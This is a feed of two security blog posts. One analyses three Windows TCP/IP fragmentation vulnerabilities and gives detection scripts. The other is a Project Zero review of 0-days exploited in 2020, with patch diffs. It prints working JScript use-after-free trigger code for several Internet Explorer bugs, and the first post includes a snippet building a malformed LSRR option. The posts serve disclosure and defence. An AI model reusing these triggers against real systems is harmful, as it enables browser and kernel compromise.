Researchers Follow the Breadcrumbs: The Latest Vulnerabilities in Windows’ Network Stack

9 February 2021 at 19:07

The concept of a trail of breadcrumbs in the offensive security community is nothing new; for many years, researchers on both sides of the ethical spectrum have followed the compass based on industry-wide security findings, often leading to groundbreaking discoveries in legacy and modern codebases alike. This has happened in countless instances, from Java to Flash to Internet Explorer and many more, often resulting in widespread findings and the subsequent elimination or modification of large amounts of code. Over the last 12 months, we have noticed a similar trend in the analysis, discovery and disclosure of vulnerabilities in networking stacks. Starting with JSOF’s Ripple20, which we analyzed and released signatures for, a clear pattern emerged as researchers investigated anew the threat surfaces in the TCP/IP stacks deployed worldwide. Microsoft was no exception, of course: the Windows networking stack dates back to the earliest iterations of Windows and is frequently updated with new features and fixes.

In fact, looking back at just the last 8 months of Microsoft patches, we’ve tracked at least 25 significant vulnerabilities directly related to the Windows network stack. These have ranged from DNS to NTFS, SMB to NFS, and recently, several TCP/IP bugs in fragmentation and packet reassembly for IPv4 and IPv6.

That brings us to this month’s Patch Tuesday, which contains several more high-profile critical vulnerabilities in tcpip.sys. We’ll focus on three of these: two marked as “remote code execution” bugs, which could lead to wormability if code execution is truly possible, and a persistent denial-of-service vulnerability that could cause a permanent Blue Screen of Death on the latest versions of Windows.

There are clear similarities between all three, indicating that both Microsoft and external researchers are highly interested in auditing this driver and are having success weeding out a number of interesting bugs. The following is a short summary of each bug and the progress we have made to date in analyzing them.

What is CVE-2021-24086?
The first vulnerability analyzed in this set is a denial-of-service (DoS) attack. Generally, these types of bugs are rather uninteresting; however, a few have enough impact that, although an attacker can’t get code execution, they are well worth discussing. This is one of those few. One of the things that boosts this vulnerability’s impact is that it is Internet-routable: many devices using IPv6 can be directly accessible over the Internet, even when behind a router. It is also worth noting that the default Windows Defender Firewall configuration does not mitigate this attack. In a worst-case scenario, an attacker could spray this attack and put it on a continuous loop to potentially cause a “permanent” or persistent DoS to a wide range of systems.

This vulnerability exists when Windows’ tcpip.sys driver attempts to reassemble fragmented IPv6 packets; as a result, the attack requires many packets to be successful. The root cause of this vulnerability is a NULL pointer dereference which occurs in Ipv6pReassembleDatagram. The crash occurs when reassembling a packet with around 0xffff bytes of extension headers. According to the RFC, it should be impossible to send a packet with that many bytes of extension headers; however, the Ipv6pReceiveFragments function does not account for this when calculating the unfragmented length. Leveraging a proof-of-concept obtained through the Microsoft MAPP program, McAfee was easily able to reproduce this bug, demonstrating it has the potential to be seen in the wild.
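Since the signatures McAfee released are not reproduced here, the following is a minimal detection sketch in Python/Scapy of the anomaly described above: it sums the sizes of the extension headers in the unfragmentable part of captured IPv6 fragments and flags totals that should be impossible under the RFC. The 2048-byte threshold and the specific header types walked are our illustrative assumptions, not the actual signature logic.

# Sketch: flag IPv6 fragments carrying suspiciously large extension
# headers. Illustrative only -- not McAfee's released network signatures.
from scapy.all import rdpcap
from scapy.layers.inet6 import (IPv6, IPv6ExtHdrFragment, IPv6ExtHdrHopByHop,
                                IPv6ExtHdrDestOpt, IPv6ExtHdrRouting)

EXT_HDR_LIMIT = 2048  # hypothetical sanity threshold, far below 0xffff
EXT_TYPES = (IPv6ExtHdrHopByHop, IPv6ExtHdrDestOpt, IPv6ExtHdrRouting)

def unfragmentable_ext_len(pkt):
    # Sum the on-wire sizes of the extension headers that precede the
    # Fragment header; each encodes its length as (len + 1) * 8 bytes.
    total, layer = 0, pkt[IPv6].payload
    while isinstance(layer, EXT_TYPES):
        total += (layer.len + 1) * 8
        layer = layer.payload
    return total

for pkt in rdpcap("capture.pcap"):
    if IPv6 in pkt and IPv6ExtHdrFragment in pkt:
        n = unfragmentable_ext_len(pkt)
        if n > EXT_HDR_LIMIT:
            print(f"suspicious fragment from {pkt[IPv6].src}: "
                  f"{n} bytes of extension headers")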

What is CVE-2021-24094?
This vulnerability is classified as Remote Code Execution (RCE), though based on our analysis thus far, code execution comes with unique challenges. Similar to CVE-2021-24086, this issue involves IPv6 packet reassembly by the Windows tcpip.sys driver. It differs from 24086 in that it doesn’t require a large packet with extension headers, and it is not a NULL pointer dereference. Instead, it is a dangling pointer which, if the right packet data is sprayed by an attacker over IPv6, will cause the pointer to be overwritten and reference an arbitrary memory location. When the data at the pointer’s target is accessed, it causes a page fault and thus a Blue Screen of Death (BSOD). Additionally, an attacker can make the DoS persistent by continually pointing the attack at a victim machine.

While this issue has crashed the target in every reproduction so far, it’s unclear how easy it would be to force the pointer to a location that would allow valid execution without crashing. The pointer would need to point to a paged-in memory location that had already been written with data capable of manipulating the IPv6 reassembly code; that would likely not come from this attack alone but would require a separate attack.

What is CVE-2021-24074?
CVE-2021-24074 is a potential RCE in tcpip.sys triggered during the reassembly of fragmented IPv4 packets in conjunction with a confusion of IPv4 IP options. During reassembly, it is possible to have two fragments with different IP options; this violates the IPv4 standard, but Windows proceeds anyway while failing to perform proper sanity checks on the respective options. This type confusion can be leveraged to trigger an out-of-bounds (OOB) read and write by “smuggling” a Loose Source and Record Route (LSRR) IP option with invalid parameters. This option is normally meant to specify the route a packet should take: it has a variable length, starts with a pointer field, and is followed by a list of IP addresses to route the packet through.
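For reference, the on-wire layout of an LSRR option per RFC 791 is type (0x83), length, pointer, then the list of 4-byte addresses; the pointer is a 1-based offset into the option whose minimum legal value is 4. The short sketch below builds a deliberately malformed option of the kind described above; the concrete values are illustrative assumptions, not the exploit’s actual payload.

# RFC 791 LSRR option: type (0x83) | length | pointer | route data.
import socket, struct

route = [socket.inet_aton("10.0.0.1")]   # one 4-byte hop
length = 3 + 4 * len(route)              # type + len + ptr + addresses
pointer = 40                             # invalid: points past the route list
lsrr = struct.pack("BBB", 0x83, length, pointer) + b"".join(route)
print(lsrr.hex())                        # 8307280a000001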

By leveraging the type confusion, we have an invalid pointer field that will point beyond the end of the routing list provided in the packet. When the routing function Ipv4pReceiveRoutingHeader looks up the next hop for the packet, it will OOB read this address (as a DWORD) and perform a handful of checks on it. If these checks are successful, the IP stack will attempt to route the packet to its next hop by copying the original packet and then writing its own IP address in the record route. Because this write relies on the same invalid pointer value as before, this turns out to be an OOB write (beyond the end of the newly allocated packet). The content of this OOB write is the IP address of the target machine represented as a DWORD (thus, not controlled by the attacker).

Microsoft rates this bug as “Exploitation more likely”; however, exploitation might not be as straightforward as it sounds. For an attack to succeed, one would have to groom the kernel heap to place a suitable value to be read during the OOB read, and then arrange for the OOB write to corrupt something of interest. Likely, a better exploitation primitive would need to be established first in order to successfully exploit the bug: for instance, leveraging the OOB write to corrupt another data structure in a way that leads to information disclosure and/or a write-what-where scenario.

From a detection standpoint, the telltale sign of active exploitation would be fragmented packets whose IP options vary between fragments. For instance, the first fragment would not contain an LSRR option, while the second fragment would. This would likely be accompanied by heavy traffic meant to shape the kernel heap.
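A rough Scapy sketch of that detection heuristic is below. The grouping key and the simple mismatch test are our assumptions; a production signature would also account for fragment ordering and evasion.

# Sketch: flag IPv4 fragment trains whose IP options differ between
# fragments, e.g. an LSRR option "smuggled" into a non-first fragment.
from collections import defaultdict
from scapy.all import rdpcap
from scapy.layers.inet import IP

def option_names(pkt):
    return sorted(opt.__class__.__name__ for opt in pkt[IP].options)

trains = defaultdict(list)  # (src, dst, id, proto) -> per-fragment options
for pkt in rdpcap("capture.pcap"):
    if IP in pkt and (pkt[IP].flags.MF or pkt[IP].frag != 0):
        key = (pkt[IP].src, pkt[IP].dst, pkt[IP].id, pkt[IP].proto)
        trains[key].append(option_names(pkt))

for key, opts in trains.items():
    if len(opts) > 1 and any(o != opts[0] for o in opts[1:]):
        print(f"option mismatch across fragments: {key} -> {opts}")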

Similarities and Impact Assessment
There are obvious similarities between all three of these vulnerabilities. Each is present in the tcpip.sys driver, responsible for parsing IPv4 and IPv6 traffic. Furthermore, the bugs all deal with packet reassembly, and the RCE vulnerabilities leverage similar functions for IPv4 and IPv6 respectively. Given a combination of public and Microsoft-internal attribution, it’s clear that researchers and vendor alike are chasing down the same types of bugs. Whenever we see vulnerabilities in network stacks or Internet-routed protocols, we’re especially interested in determining the difficulty of exploitation, wormability, and impact. For vulnerabilities such as the RCEs above, a deep dive is essential to understand the likelihood of these types of flaws being built into exploit kits or used in targeted attacks; they are prime candidates for threat actors to weaponize. Despite the real potential for harm, the criticality of these bugs is somewhat lessened by a higher bar to exploitation and the upcoming patches from Microsoft. We do expect to see additional vulnerabilities in the TCP/IP stack and will continue to provide similar analysis and guidance. As it is likely to take some time for threat actors to integrate these vulnerabilities in a meaningful way, the best course of action, as always, is widespread mitigation via patching.


Déjà vu-lnerability

3 February 2021 at 17:10

A Year in Review of 0-days Exploited In-The-Wild in 2020

Posted by Maddie Stone, Project Zero

2020 was a year full of 0-day exploits. Many of the Internet’s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches — patches that don’t correctly and comprehensively fix the root cause of a vulnerability — allow attackers to use 0-days against users with less effort.

Since mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero’s mission has been to “make 0-day hard”. From that came the goal of our in-the-wild program: “Learn from 0-days exploited in-the-wild in order to make 0-day hard.” In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public’s understanding of 0-day exploitation is only helpful when it doesn’t diverge from the “private state-of-the-art”, what attackers are doing and are capable of.

Over the last 18 months, we’ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. For the 2nd year in a row, we’re publishing a “Year in Review” report of the previous year’s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in each individual exploit’s analysis, please check out our root cause analyses.

When looking at the 24 0-days detected in-the-wild in 2020, there’s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days. 

A correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we’re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.
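As a toy illustration (hypothetical Python, not drawn from any of the bugs discussed below), consider a vulnerable routine reachable from two call paths, where the patch gates only the path the proof-of-concept used. The patch may be correct for that path, yet it is not comprehensive:

def looks_malformed(buf: bytes) -> bool:
    # Naive check mirroring only the PoC's trigger bytes.
    return buf.startswith(b"TRIGGER")

def render_untrusted(buf: bytes):
    # Hypothetical vulnerable parsing routine; a complete patch would
    # fix the flaw here, covering every caller at once.
    pass

def open_document(buf: bytes):
    # The path demonstrated in the attacker's PoC. A symptom-level patch
    # gates only this entry point...
    if looks_malformed(buf):
        raise ValueError("rejected")
    render_untrusted(buf)

def preview_attachment(buf: bytes):
    # ...while this second path still reaches the same flaw: a variant.
    render_untrusted(buf)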

While the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.

This vulnerability looks familiar 🤔

As stated in the introduction, 2020 included 0-day exploits that are similar to ones we’ve seen before. Six of the 24 0-day exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to become a new working 0-day exploit. This section explains how each of these six actively exploited 0-days is related to a previously seen vulnerability. We’re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it’s much easier to then exploit another.

Product                      | Vulnerability exploited in-the-wild | Variant of...
Microsoft Internet Explorer | CVE-2020-0674  | CVE-2018-8653*, CVE-2019-1367*, CVE-2019-1429*
Mozilla Firefox             | CVE-2020-6820  | Mozilla Bug 1507180
Google Chrome               | CVE-2020-6572  | CVE-2019-5870, CVE-2019-13695
Microsoft Windows           | CVE-2020-0986  | CVE-2019-0880*
Google Chrome/Freetype      | CVE-2020-15999 | CVE-2014-9665
Apple Safari                | CVE-2020-27930 | CVE-2015-0093

* vulnerability was also exploited in-the-wild in previous years

Internet Explorer JScript CVE-2020-0674

CVE-2020-0674 is the fourth vulnerability that’s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the 2019 year-in-review we devoted a section to these vulnerabilities. Google’s Threat Analysis Group attributed all four exploits to the same threat actor. It bears repeating: the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.

JScript is the legacy JavaScript engine in Internet Explorer. While it’s legacy, it is still enabled by default in Internet Explorer 11, which is a built-in feature of Windows 10. The bug class, or type of vulnerability, is that a specific JScript object, a variable (which uses the VAR struct), is not tracked by the garbage collector. I’ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.

CVE-2018-8653

In December 2018, it was discovered that CVE-2018-8653 was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a write-up going through each step of this exploit.

var objs = new Array();
var refs = new Array();
var dummyObj = new Object();

function getFreeRef()
{
  // 5. delete prototype objects as well as ordinary objects
  for ( var i = 0; i < 10000; i++ ) {
    objs[i] = 1;
  }
  CollectGarbage();
  for ( var i = 0; i < 200; i++ )
  {
    refs[i].prototype = 1;
  }
  // 6. Garbage collector frees unused variable blocks.
  // This includes the one holding the "this" variable
  CollectGarbage();
  // 7. Boom
  alert(this);
}

// 1. create "special" objects for which isPrototypeOf can be invoked
for ( var i = 0; i < 200; i++ ) {
  var arr = new Array({ prototype: {} });
  var e = new Enumerator(arr);
  refs[i] = e.item();
}

// 2. create a bunch of ordinary objects
for ( var i = 0; i < 10000; i++ ) {
  objs[i] = new Object();
}

// 3. create objects to serve as prototypes and set up callbacks
for ( var i = 0; i < 200; i++ ) {
  refs[i].prototype = {};
  refs[i].prototype.isPrototypeOf = getFreeRef;
}

// 4. calls isPrototypeOf. This sets up refs[100].prototype as "this" variable
// During callback, the "this" variable won't be tracked by the Garbage collector
// use different index if this doesn't work
dummyObj instanceof refs[100];

CVE-2019-1367

In September 2019, CVE-2019-1367 was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time, though, the untracked variables are in the arguments array of the Array.sort callback.

var spray = new Array();

function F() {
    // 2. Create a bunch of objects
    for (var i = 0; i < 20000; i++) spray[i] = new Object();
    // 3. Store a reference to one of them in the arguments array
    //    The arguments array isn't tracked by garbage collector
    arguments[0] = spray[5000];
    // 4. Delete the objects and call the garbage collector
    //    All JScript variables get reclaimed...
    for (var i = 0; i < 20000; i++) spray[i] = 1;
    CollectGarbage();
    // 5. But we still have reference to one of them in the
    //    arguments array
    alert(arguments[0]);
}

// 1. Call sort with a custom callback
[1,2].sort(F);

CVE-2019-1429

The CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the patch was applied!

In November 2019, Microsoft released another patch to address this gap. CVE-2019-1429 addressed the shortcomings of the CVE-2019-1367 patch and also fixed a variant: the variables in the arguments array are not tracked by the garbage collector in the toJSON callback rather than the Array.sort callback. The only difference between the variant triggers is in the lines marked with + and - below: instead of calling the Array.sort callback, we call the toJSON callback.

var spray = new Array();

function F() {
    // 2. Create a bunch of objects
    for (var i = 0; i < 20000; i++) spray[i] = new Object();
    // 3. Store a reference to one of them in the arguments array
    //    The arguments array isn't tracked by garbage collector
    arguments[0] = spray[5000];
    // 4. Delete the objects and call the garbage collector
    //    All JScript variables get reclaimed...
    for (var i = 0; i < 20000; i++) spray[i] = 1;
    CollectGarbage();
    // 5. But we still have reference to one of them in the
    //    arguments array
    alert(arguments[0]);
}

+  // 1. Cause toJSON callback to fire
+  var o = {toJSON:F}
+  JSON.stringify(o);

-  // 1. Call sort with a custom callback
-  [1,2].sort(F);

CVE-2020-0674

In January 2020, CVE-2020-0674 was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only change required to the trigger for CVE-2019-1367 is to swap the references to arguments[] for one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.

var spray = new Array();

+  function F(arg1, arg2) {
-  function F() {
    // 2. Create a bunch of objects
    for (var i = 0; i < 20000; i++) spray[i] = new Object();
    // 3. Store a reference to one of them in one of the named arguments
    //    The named arguments aren't tracked by garbage collector
+    arg1 = spray[5000];
-    arguments[0] = spray[5000];
    // 4. Delete the objects and call the garbage collector
    //    All JScript variables get reclaimed...
    for (var i = 0; i < 20000; i++) spray[i] = 1;
    CollectGarbage();
    // 5. But we still have reference to one of them in
    //    a named argument
+    alert(arg1);
-    alert(arguments[0]);
}

// 1. Call sort with a custom callback
[1,2].sort(F);

CVE-2020-0968

Unfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched CVE-2020-0968, another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the advisory).

var spray = new Array();

function f1() {
  alert('callback 1');
  return spray[6000];
}

function f2() {
  alert('callback 2');
  spray = null;
  CollectGarbage();
  return 'a'
}

function boom() {
  var e = o1;
  var d = o2;
  // 3. the first callback (e.toString) happens
  //    it returns one of the string variables
  //    which is stored in a temporary variable
  //    on the stack, not tracked by garbage collector
  // 4. Second callback (d.toString) happens
  //    There, string variables get freed
  //    and the space reclaimed
  // 5. Crash happens when attempting to access
  //    string content of the temporary variable
  var b = e + d;
  alert(b);
}

// 1. create two objects with toString callbacks
var o1 = { toString: f1 };
var o2 = { toString: f2 };

// 2. create a bunch of string variables
for (var a = 0; a < 20000; a++) {
  spray[a] = "aaa";
}

boom();

In addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of “plug and play” quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit.

Firefox CVE-2020-6820

Mozilla patched CVE-2020-6820 in Firefox with an out-of-band security update in April 2020. It is a use-after-free in the Cache subsystem.

CVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the content process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl still has ReadStreams when StreamList::CloseAll is called (it must be the Parent, which lives in the browser process, in order to get the use-after-free in the browser process; the Child lives in the renderer), then this will cause the CacheStreamControlParent to be freed. The mId member of the CacheStreamControlParent is then subsequently accessed, causing the use-after-free.

The execution path for CVE-2020-6820 is:

StreamList::CloseAll  <- Patched function
  CacheStreamControlParent::CloseAll
    CacheStreamControlParent::NotifyCloseAll
      StreamControl::CloseAllReadStreams
        For each stream:
          ReadStream::Inner::CloseStream
            ReadStream::Inner::Close
              ReadStream::Inner::NoteClosed
                StreamControl::NoteClosed
                  StreamControl::ForgetReadStream
                    CacheStreamControlParent/Child::NoteClosedAfterForget
                      CacheStreamControlParent::RecvNoteClosed
                        StreamList::NoteClosed
                          If StreamList is empty && mStreamControl:
                            CacheStreamControlParent::Shutdown
                              Send__delete(this)  <- FREED HERE!
    PCacheStreamControlParent::SendCloseAll  <- Used here in call to Id()

CVE-2020-6820 is a variant of an internally-found Mozilla vulnerability, Bug 1507180, which was discovered in November 2018 and patched in December 2019. Bug 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, an explanatory comment for why the December 2019 patch was needed was added in early March 2020.

For Bug 1507180, the execution path was the same as for CVE-2020-6820, except that the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams, rather than a few calls “higher” in StreamList::CloseAll.

Personally, I have doubts about whether this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [1, 2]) has found a way to trigger this vulnerability without shutting down the process. Therefore, exploiting it doesn’t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our in-the-wild tracking spreadsheet and is thus included in this list.

Chrome for Android CVE-2020-6572

CVE-2020-6572 is a use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that when one `unique_ptr` is assigned to another, the object it previously referenced goes out of scope and can be deleted, while a raw pointer into that originally referenced object isn't updated.

More specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder).

The vulnerability that was exploited in-the-wild was reported in April 2020. Seven months prior, in September 2019, Man Yue Mo of Semmle reported a very similar vulnerability, CVE-2019-13695. CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572; it’s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.

In addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The vulnerability was that the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice), leading to a use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is CVE-2019-5870. Guang Gong used this vulnerability as part of an Android exploit chain, which he presented at Black Hat USA 2020: “TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices”.

While one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This was noted in the issue tracker for CVE-2019-5870 and then brought up again after Man Yue Mo reported CVE-2019-13695.

Windows splwow64 CVE-2020-0986

CVE-2020-0986 is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and CVE-2019-0880, which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D.

From ByteRaptors’ great write-up on CVE-2019-0880, the pseudocode that allows the controlling of the memcpy is:

void GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)
{
  ...
  if(*((BYTE*)(firstAddress + 0x4)) == 0x75){
    ULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));
    if(memcpyDestinationAddress != NULL){
      ULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));
      DWORD copySize = *((DWORD*)(firstAddress + 0x28));
      memcpy(memcpyDestinationAddress,sourceAddress,copySize);
    }
  }
  ...
}

The equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed, as marked below.

void GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)
{
  ...
  if(*((BYTE*)(msgSend + 0x4)) == 0x6D){
    ...
    ULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));
    if(srcAddress != NULL){
      DWORD copySize = *((DWORD*)(msgSend + 0x40));
      if(copySize <= 0x1FFFE) {
        ULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));
        memcpy(destAddress,srcAddress,copySize);
      }
    }
  }
  ...
}

In addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the “Exploited 0-days not properly fixed” section below.

Freetype CVE-2020-15999

In October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, CVE-2020-15999. The vulnerability is a heap buffer overflow in the Load_SBit_Png function, triggered by an integer truncation. Load_SBit_Png processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype truncated them to 16-bit integers, and this truncated value was used to calculate the bitmap size, with the backing buffer allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.

In November 2014, Project Zero team member Mateusz Jurczyk reported CVE-2014-9665 to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small.

To patch CVE-2014-9665, Freetype added a check to the rows and width prior to calculating the size as shown below.

if ( populate_map_and_metrics )
    {
      FT_Long  size;

      metrics->width  = (FT_Int)imgWidth;
      metrics->height = (FT_Int)imgHeight;

      map->width      = metrics->width;
      map->rows       = metrics->height;
      map->pixel_mode = FT_PIXEL_MODE_BGRA;
      map->pitch      = map->width * 4;
      map->num_grays  = 256;

+      /* reject too large bitmaps similarly to the rasterizer */
+      if ( map->rows > 0x7FFF || map->width > 0x7FFF )
+      {
+        error = FT_THROW( Array_Too_Large );
+        goto DestroyExit;
+      }

      size = map->rows * map->pitch;   <- overflow size

      error = ft_glyphslot_alloc_bitmap( slot, size );
      if ( error )
        goto DestroyExit;
    }

To patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the Load_SBit_Png function and changed to use imgHeight and imgWidth, the width and height values that are included in the header of the PNG.

     if ( populate_map_and_metrics )
     {
+      /* reject too large bitmaps similarly to the rasterizer */
+      if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )
+      {
+        error = FT_THROW( Array_Too_Large );
+        goto DestroyExit;
+      }
+
       metrics->width  = (FT_UShort)imgWidth;
       metrics->height = (FT_UShort)imgHeight;

       map->width      = metrics->width;
       map->rows       = metrics->height;
       map->pixel_mode = FT_PIXEL_MODE_BGRA;
       map->pitch      = map->width * 4;
       map->num_grays  = 256;

-      /* reject too large bitmaps similarly to the rasterizer */
-      if ( map->rows > 0x7FFF || map->width > 0x7FFF )
-      {
-        error = FT_THROW( Array_Too_Large );
-        goto DestroyExit;
-      }

[...]

To summarize:

  • CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map->rows * map->pitch; calculation.
  • CVE-2020-15999 caused a buffer overflow by truncating metrics->width and metrics->height which are then used to calculate the size field, thus causing the size field to be too small.

A fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and widths from the PNG headers early would have prevented both manners of triggering this buffer overflow.
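A small Python sketch makes the two failure modes concrete. The 16-bit and 32-bit masks stand in for FreeType's FT_UShort cast and a 32-bit FT_Long respectively, and the concrete dimensions are illustrative assumptions:

# Both bugs make the allocated size smaller than the data later copied in.

def alloc_size_2014(rows, width):
    # CVE-2014-9665: size = rows * pitch can overflow a 32-bit FT_Long.
    pitch = width * 4
    return (rows * pitch) & 0xFFFFFFFF

def alloc_size_2020(img_width, img_height):
    # CVE-2020-15999: 32-bit PNG dimensions truncated to FT_UShort first.
    width, rows = img_width & 0xFFFF, img_height & 0xFFFF
    return rows * (width * 4)

# Overflow: 0x8000 * (0x8000 * 4) == 2**32 wraps to 0 -> tiny allocation.
print(hex(alloc_size_2014(0x8000, 0x8000)))    # 0x0
# Truncation: 0x10002 becomes 2 -> allocation for a 2x2 bitmap, while the
# copy loop still uses the original 0x10002-pixel dimensions.
print(hex(alloc_size_2020(0x10002, 0x10002)))  # 0x10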

Apple Safari CVE-2020-27930

This vulnerability is slightly different than the rest in that while it’s still a variant, it’s not clear that by current disclosure norms, one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there’s no true “upstream”. However when vulnerabilities were reported in Microsoft’s, Apple’s, or Adobe’s fork, there is a possibility (though no guarantee) that it was also in the others.

The CVE-2020-27930 vulnerability was used in an exploit chain for iOS. The variant, CVE-2015-0093, was reported to Microsoft in November 2014. In CVE-2015-0093, the vulnerability is in the blend operator in Microsoft’s implementation of Adobe’s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or correctly handle the case where n is negative, allowing the font to arbitrarily read and write on the native interpreter stack.

CVE-2020-27930, the vulnerability exploited in-the-wild in 2020, is very similar. This time the vulnerability is in the callothersubr operator in Apple’s implementation of Adobe’s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack, but did not validate or correctly handle negative values of n, leading to the same outcome of arbitrary stack read/write.

